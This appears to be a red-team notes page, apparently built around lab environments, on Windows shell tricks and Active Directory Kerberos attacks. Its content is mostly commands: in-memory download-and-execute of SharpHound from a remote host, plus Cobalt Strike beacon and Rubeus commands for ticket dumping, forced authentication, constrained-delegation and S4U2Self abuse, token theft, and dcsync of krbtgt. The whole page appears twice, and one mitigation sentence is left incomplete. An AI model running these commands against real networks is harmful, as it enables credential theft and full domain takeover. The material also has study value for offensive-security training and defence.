Tips & Tricks

PowerShell

Running a service in the background (Equivalent of using the & at the end of a command Linux):

Start-Job {<COMMAND TO RUN>}

Killing the initial shell WILL kill the sub process. Only use this command if you know that initial shell will remain active.

Command Prompt

Running a service in the background (Equivalent of using the & at the end of a command Linux):

START /B <COMMAND>

Killing the initial shell WILL kill the sub process. Only use this command if you know that initial shell will remain active.

Downloading and Running a EXE in Memory

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())

Get a list of tickets

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

Extract:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap

Use the extracted ticket:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8=

Jump into the process with that token

beacon> steal_token 1540

You can also force Computer objects to authenticate with the service and steal their tickets: Monitor for new tickets with Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

Run SharpSpoolTrigger to force authentication

beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io

DC-2 is the target and WEB is the listener

Machine tickets can be used using the S4U2Self Abuse method.

Constrained Delegation

This aims to restrict the services to which the server can act on behalf of a user. The constrains no longer allow the server to cache TGTs of other users. Instead, it is only allowed to get TGS for another user with its own TGT.

Finding computers with constrained delegation:

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Finding users with constrained delegation:

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Constrained delegation can be configured on user accounts as well as user accounts.

First, we need the TGT of the account (user or computer) that is trusted for delegation. You can get this with the dump command of Rubeus.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

If you have the NTLM or AES hash of the user, you can request the TGT using the asktgt in Rubeus.

Next you can perform a S4U request to obtain a usable TGS for the allowed service.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap

/impersonateuser is the user we want to impersonate - they should have local admin access on the target machine. nlamb is a domain admin which is required for accessing the domain controller.
/msdsspn is the service principal name that SQL-2 is allowed to delegate to.
/user is the principal allowed to perform the delegation.
/ticket is the TGT for /user.

The above will perform a S4U2Self and then S4U2Proxy to get the S4U2Proxy ticket needed.

Create a process we can steal:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

Steal the process:

beacon> steal_token 5540

Alternate Service Name

https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/ When configuring Kerberos Constrained Delegation, keep in mind that you are delegating credentials not only to the service type you specified but also to the rest of the service types running under the same account. Also, the SPN specified in the sname field, doesn’t seem to be used as part of the authentication mechanism.

However, the sname field of the ticket is not signed and can be tampered with. So you can change the sname of the ticket to another sname that is being ran by the same account as the previous one and get access to the requested SPN.

You can abuse this with Rubeus

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

beacon> steal_token 2580

If you get LDAP on the DC, you can perform a dcsync attack.

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

S4U2Self Abuse

S4U2Self allows a service to obtain a TGS to itself on behalf of another user. S4U2Proxy allows a service to obtain a TGS on behalf of a user to another service.

If we have the TGT of the computer that can perform S4U2Self, we can request to impersonate any user to the service provided by that account.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap

The /self flag is used to get a TGS on behalf of another user to itself.

You can then use that ticket to create a process as that user and use that to authenticate to other systems.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

beacon> steal_token 2664

PreviousCompile Code NextLinux OS Information Gathering

Last updated 2 years ago

Was this helpful?

Tips & Tricks

PowerShell

Running a service in the background (Equivalent of using the & at the end of a command Linux):

Start-Job {<COMMAND TO RUN>}

Killing the initial shell WILL kill the sub process. Only use this command if you know that initial shell will remain active.

Command Prompt

Running a service in the background (Equivalent of using the & at the end of a command Linux):

START /B <COMMAND>

Killing the initial shell WILL kill the sub process. Only use this command if you know that initial shell will remain active.

Downloading and Running a EXE in Memory

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())

Get a list of tickets

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage

Extract:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap

Use the extracted ticket:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8=

Jump into the process with that token

beacon> steal_token 1540

You can also force Computer objects to authenticate with the service and steal their tickets: Monitor for new tickets with Rubeus:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

Run SharpSpoolTrigger to force authentication

beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io

DC-2 is the target and WEB is the listener

Machine tickets can be used using the S4U2Self Abuse method.

Constrained Delegation

Finding computers with constrained delegation:

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Finding users with constrained delegation:

beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json

Constrained delegation can be configured on user accounts as well as user accounts.

First, we need the TGT of the account (user or computer) that is trusted for delegation. You can get this with the dump command of Rubeus.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap

If you have the NTLM or AES hash of the user, you can request the TGT using the asktgt in Rubeus.

Next you can perform a S4U request to obtain a usable TGS for the allowed service.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap

/impersonateuser is the user we want to impersonate - they should have local admin access on the target machine. nlamb is a domain admin which is required for accessing the domain controller.
/msdsspn is the service principal name that SQL-2 is allowed to delegate to.
/user is the principal allowed to perform the delegation.
/ticket is the TGT for /user.

The above will perform a S4U2Self and then S4U2Proxy to get the S4U2Proxy ticket needed.

Create a process we can steal:

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

Steal the process:

beacon> steal_token 5540

Alternate Service Name

This can be mitigated by enabling .

You can abuse this with Rubeus

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

beacon> steal_token 2580

If you get LDAP on the DC, you can perform a dcsync attack.

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

S4U2Self Abuse

S4U2Self allows a service to obtain a TGS to itself on behalf of another user. S4U2Proxy allows a service to obtain a TGS on behalf of a user to another service.

If we have the TGT of the computer that can perform S4U2Self, we can request to impersonate any user to the service provided by that account.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap

The /self flag is used to get a TGS on behalf of another user to itself.

You can then use that ticket to create a process as that user and use that to authenticate to other systems.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

beacon> steal_token 2664

PreviousCompile Code NextLinux OS Information Gathering

Last updated 2 years ago

Was this helpful?